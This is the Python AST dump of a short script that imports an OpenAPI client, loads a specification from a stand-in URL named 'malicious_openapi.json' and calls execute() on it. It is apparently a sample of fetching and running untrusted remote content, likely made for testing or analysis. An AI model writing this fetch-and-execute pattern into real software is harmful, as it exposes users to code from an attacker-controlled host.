Module(
    body=[
        Import(
            names=[
                alias(name='openapi_client')]),
        Assign(
            targets=[
                Name(id='client', ctx=Store())],
            value=Call(
                func=Attribute(
                    value=Attribute(
                        value=Name(id='openapi_client', ctx=Load()),
                        attr='Client',
                        ctx=Load()),
                    attr='from_url',
                    ctx=Load()),
                args=[
                    Constant(value='https://example.com/malicious_openapi.json')],
                keywords=[])),
        Expr(
            value=Call(
                func=Attribute(
                    value=Name(id='client', ctx=Load()),
                    attr='execute',
                    ctx=Load()),
                args=[],
                keywords=[]))],
    type_ignores=[])